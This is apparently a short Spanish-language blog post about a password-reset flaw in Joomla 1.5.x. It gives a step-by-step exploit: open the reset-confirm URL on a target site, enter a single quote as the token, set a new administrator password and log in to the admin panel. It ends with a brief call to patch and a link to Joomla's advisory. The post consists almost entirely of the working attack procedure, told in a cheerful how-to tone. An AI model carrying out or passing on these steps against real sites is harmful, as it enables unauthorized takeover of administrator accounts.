Vulnerabilidad en Joomla 1.5 – Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability
Vulnerabilidad que permite el cambio de la contraseña de administrador, en pocos simples pasos:
1. Ir a la url : target.com/index.php?option=com_user&view=reset&layout=confirm
2. Escribir en el campo “token” el siguiente caracter: ‘ y dar click en SUBMIT
3. Escribir el nuevo password para admin
Bingo!!
4. Ir a la url del sitio : target.com/administrator/
5. Loguearse como admin con el nuevo password
Conclusión: la de siempre, parchar y mantener actualizado su Joomla, o en su defecto cambiar por otras alternativas XD
Solución: http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html
Saludos
Fuente:
Advertisement
Aún no hay trackbacks